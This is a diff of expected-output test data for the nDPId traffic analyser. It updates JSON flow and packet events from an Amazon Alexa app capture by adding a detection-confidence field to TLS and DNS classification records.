-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01261{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01380{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01287{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1490976043611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1490976043611,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WlZAAEARM16sECrYrBAqAalWADUAK0G7veEBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043611,"flow_last_seen":1490976043611,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1490976043611,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00364{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1490976043617,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"}
 00173{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":392,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1490976043811,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1490976043811,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP0pFAAEARuxKsECoBrBAq2AA1qVYAO\/ZCveGBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAAbAARIFc6H"}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}}
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976043811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.135"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JoxAAEAGJqusECrYSBXOh6SRAbtDcGnhAAAAAKAC\/\/+2eAAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976043814,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976043814,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"}
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
+00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01274{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
